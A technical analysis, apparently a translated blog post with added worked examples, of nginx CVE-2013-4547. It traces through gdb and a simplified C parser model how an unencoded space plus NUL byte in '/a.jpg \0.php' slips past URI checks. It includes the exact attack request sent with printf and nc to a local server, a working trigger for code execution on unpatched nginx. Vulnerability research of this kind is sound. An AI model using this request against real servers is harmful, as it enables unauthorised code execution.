Nginx has historically had a number of parsing vulnerabilities, such as the one found by 80sec, and the one in which appending %00 directly after the extension truncated the path and led to code execution.
But at the end of 2013 nginx was hit by another one, CVE-2013-4547, which can lead to directory traversal (bypassing access restrictions) and to code execution. Affected versions: nginx 0.8.41 – 1.5.6, a wide range.
To understand in more depth why the vulnerability arises, the author took the official patch at <http://nginx.org/download/patch.2013.space.txt> as the starting point for further analysis.
To locate the point that needs analysing, enable gdb debugging, set a breakpoint at ngx_http_parse_request_line,
and watch the variables state and p: this function is a state machine, state holds the current state value, and p is the pointer into the request text being parsed. Together they are the key to where the vulnerability is triggered.
The debugging has to follow the nginx worker child process, so set follow-fork-mode child and place the breakpoint at the appropriate point.
Figure-1 Following the worker child process
http://127.0.0.1/a.jpg \0.php    (an unencoded space, then a NUL byte, then .php)
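A concrete version of the debugging setup described above, as an added example rather than the post's own gdb session. The nginx binary path, the -g directives, the listening port and the use of display instead of watch are this example's assumptions; the request is the one shown above, sent with printf because curl cannot emit a raw NUL byte.

```gdb
# Run nginx in the foreground with one worker, so the first fork gdb follows is the worker.
# (Binary path and directives are assumptions; adjust to the build under test.)
$ gdb -q --args /usr/local/nginx/sbin/nginx -g 'daemon off; worker_processes 1;'
(gdb) set follow-fork-mode child
(gdb) set detach-on-fork on
(gdb) break ngx_http_parse_request_line
(gdb) run

# In a second shell: the attack request line "GET /a.jpg \0.php HTTP/1.1".
# \000 is the octal escape printf understands for a NUL byte.
$ printf 'GET /a.jpg \000.php HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n' | nc 127.0.0.1 80

# Back in gdb, once the breakpoint hits inside the worker: show the state
# machine's current state and the byte p points at after every step.
(gdb) display state
(gdb) display/c *p
(gdb) next
```

If following the fork is inconvenient, `-g 'daemon off; master_process off;'` runs the request handling in the single gdb-controlled process; the rest of the session is the same.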
Stepping through with s or n, one finds that during URL parsing, when the path contains '.' or the URL contains '\0', the following handling applies:
    case sw_check_uri:
        ......
        case '.':
            r->complex_uri = 1;   // this flag selects ngx_http_parse_complex_uri, which normalises the path
            state = sw_uri;
            break;
        ......
        case '\0':                // a \0 byte is rejected as an illegal character
            return NGX_HTTP_PARSE_INVALID_REQUEST;
But when a space is encountered while checking the URI, the parser enters the sw_check_uri_http_09 logic, so when we send the attack request the execution flow is as follows:
Figure-2 \0 does not trigger an exception
Then, back in the sw_check_uri state, the remaining string is .php, and the '.' is taken as the separator introducing the URI's extension.
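To make the flow above concrete, here is an added example that is not nginx source and not the post's own code: a reduced model of ngx_http_parse_request_line keeping only the states needed to show how "/a.jpg \0.php" is handled. The state and field names follow nginx (sw_check_uri, sw_check_uri_http_09, uri_ext, space_in_uri), but everything else is simplified; the `reexamine` switch is this example's own device for contrasting the vulnerable flow (the byte after the run of spaces is consumed without being checked) with the patched one (the byte is pushed back into sw_check_uri, which is how I read the linked patch; verify against it). The request line and the document root are constructed test input.

```c
/* Simplified model of the nginx request-line parser around the
 * sw_check_uri / sw_check_uri_http_09 states.  Not nginx source. */
#include <stdio.h>
#include <string.h>

#define PARSE_OK       0
#define PARSE_INVALID  (-1)

typedef struct {
    const char *uri_start;
    const char *uri_end;
    const char *uri_ext;       /* text after the last '.' in the URI */
    int         space_in_uri;
} req_t;

/* line/len: the request line starting at the URI, e.g. "/x HTTP/1.1\r\n".
 * reexamine != 0 models the patched parser, 0 the vulnerable one. */
static int parse_uri(const char *line, size_t len, int reexamine, req_t *r)
{
    enum { sw_check_uri, sw_check_uri_http_09, sw_http_version } state = sw_check_uri;
    const char *p;

    memset(r, 0, sizeof *r);
    r->uri_start = line;

    for (p = line; p < line + len; p++) {
        unsigned char ch = (unsigned char) *p;

        switch (state) {
        case sw_check_uri:
            switch (ch) {
            case '.':  r->uri_ext = p + 1; break;        /* extension starts here */
            case ' ':  r->uri_end = p; state = sw_check_uri_http_09; break;
            case '\r':
            case '\n': r->uri_end = p; return PARSE_OK;
            case '\0': return PARSE_INVALID;             /* NUL seen here is rejected */
            default:   break;                            /* ordinary URI byte */
            }
            break;

        /* space+ after the URI: HTTP/0.9 request or a "space in URI" */
        case sw_check_uri_http_09:
            switch (ch) {
            case ' ':  break;
            case '\r':
            case '\n': return PARSE_OK;
            case 'H':  state = sw_http_version; break;
            default:
                r->space_in_uri = 1;
                state = sw_check_uri;
                if (reexamine) {
                    p--;            /* patched: sw_check_uri re-reads this byte */
                }
                /* vulnerable (no p--): this byte, even a NUL, is swallowed */
                break;
            }
            break;

        case sw_http_version:       /* "HTTP/x.y" itself is not modelled */
            if (ch == '\n') return PARSE_OK;
            break;
        }
    }
    return PARSE_INVALID;           /* ran out of input */
}

/* What a consumer of NUL-terminated strings (a backend handed docroot + uri)
 * sees: the bytes are copied verbatim, then read as a C string.
 * Returns the length of the path as the backend sees it. */
static size_t backend_path(const req_t *r, const char *docroot, char *out, size_t out_sz)
{
    size_t dlen = strlen(docroot);
    size_t ulen = (size_t) (r->uri_end - r->uri_start);

    if (dlen + ulen + 1 > out_sz) return 0;
    memcpy(out, docroot, dlen);
    memcpy(out + dlen, r->uri_start, ulen);
    out[dlen + ulen] = '\0';
    return strlen(out);             /* stops at the embedded NUL */
}

/* Constructed request line (not captured traffic): unencoded space, NUL, ".php". */
static const char attack_line[] = "/a.jpg \0.php HTTP/1.1\r\n";
#define ATTACK_LEN (sizeof(attack_line) - 1)

int main(void)
{
    req_t r;
    char  path[64];

    if (parse_uri(attack_line, ATTACK_LEN, 0, &r) == PARSE_OK) {
        printf("vulnerable: uri is %d bytes, ext=\"%.3s\"\n",
               (int) (r.uri_end - r.uri_start), r.uri_ext);
        backend_path(&r, "/var/www", path, sizeof path);
        printf("vulnerable: backend opens \"%s\"\n", path);
    }
    printf("patched: %s\n",
           parse_uri(attack_line, ATTACK_LEN, 1, &r) == PARSE_OK ? "accepted" : "rejected");
    return 0;
}
```

Run as-is, the vulnerable flow accepts the request with a 12-byte URI ending in ".php" (so an extension-based location match would see a PHP request), while the mapped file name "/var/www/a.jpg \0.php" is cut at the NUL and the backend opens "/var/www/a.jpg " with the trailing space; the same request with a NUL but no preceding space is rejected in both modes, which is exactly the difference the figure above shows. The patched flow rejects the request because the NUL is re-read in sw_check_uri.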